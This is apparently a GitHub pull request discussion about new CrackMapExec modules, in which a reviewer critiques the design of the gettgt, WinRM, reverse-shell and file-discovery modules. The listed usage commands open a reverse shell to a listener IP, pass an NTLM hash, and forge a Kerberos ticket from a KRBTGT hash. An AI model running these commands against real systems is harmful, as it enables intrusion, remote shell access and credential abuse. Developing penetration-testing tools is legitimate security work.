Conversation
file_discovery cme module
revshell.py
|
Although the ambition is great, I don't think gettgt is done in a very efficient way. From what I can read, you are checking to see if impacket is installed. If it is not installed, then you download impact repo to /opt/impacket and run the setup.py script to install impacket. And then you use a sub-process to run ticketer.py to request a ticket. 3f9f0e4#diff-7d45a018c200c99099fee9a07a3e87a1021598d8a56220be40b18eeec7dbe500R38 Although that would make a great shell script, crackmapexec is built around impacket. So it would likely already be installed. What you could try doing, is reading the ticketed script and re-implement it into an impacket module, similar to how this pull request was done. But running this module could actively break crackmapexec under the right circumstances. |
|
Regarding WinRM.py , RevShell.py, and File_discovery, from the looks of it, you are logging in and using powershell to run these commands. Although this might be ideal from RevShell.py, using the remote services manager (\pipe\svcctl) to enable\disable services (like winrm) would be more opsec safe. This is also how SMBexec and Psexec work. See https://github.com/fortra/impacket/blob/master/examples/psexec.py File_Discovery is also interfacing with powershell, but we do have spider_plus and spider to do file lookups. I am not the developer or main contributor to CME, so my word doesn't mean a lot, but I would check out some of the other modules to grow and expand on these. Hope this helps. |
2 participants
Modules pushed:
file_discovery:
crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M file_discovery -o SEARCH_PATH=C:\\Usersrevshell:
crackmapexec smb 192.168.163.144 -u 'Admin2' -p 'Password!' -M reverse_shell -o LHOST=192.168.163.136 LPORT=1234 HTTP_SERVER=8443winrm
gettgt
crackmapexec smb 192.168.246.139 -u Administrador -H 2b576acbe6bcfda7294d6bd18041b8fe -M gettgt -o KRBTGT_NTLM=70a415ccf57e2a3c781764a3b1beee95 TARGET_USER=domain_user